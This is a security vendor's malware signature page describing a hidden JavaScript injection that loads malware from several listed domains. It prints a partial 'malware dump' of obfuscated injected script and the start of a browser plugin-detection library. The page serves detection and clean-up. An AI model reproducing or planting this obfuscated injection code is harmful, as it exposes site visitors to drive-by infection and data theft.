SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwhjck3123

malware-entry-mwhjck3123

Description:

A hidden and suspicious javascript (or iframe) was found on the site. It is loaded from a blacklisted (and malicious domain) and used to steal information from site visitors and/or infect them. Loads malware from multiple locations:


http://dsnextgen.com/?a_id=10636..
http://perfumefrosty.org/nnc0xazxwahh5ifg/
http://www.paid-to-promote.net/
http://www.777seo.com/pop.php?username=..
(and many other domains).

Affecting:

Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: http://sucuri.net/signup

 

Malware dump (sample of malware):


gab = 14; gab- = 2361;amp=8201;if(amp!=null){ran=2318;ran++;wry=0.001;wry++}wit=oxo("ExBWOB4XquJZ8l0h5MnMl37j2zZHx0eZStpY3trfFkYl2VtTRtAyX3UamBnEl0WGBROBg1aPdM8lub5UrAYaTSMWgTxNefSAywzUr5jiLhTYtUZUJEXWUrv1n4keCPVWiY4lqKJY8curQz1SEpLjiag9KXhjUvIOvBGZj6LjTKwhZMA3d7',7);

var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a) {return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b) {return(/array/i).test(Object.prototype.toString.call(b))},isF unc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&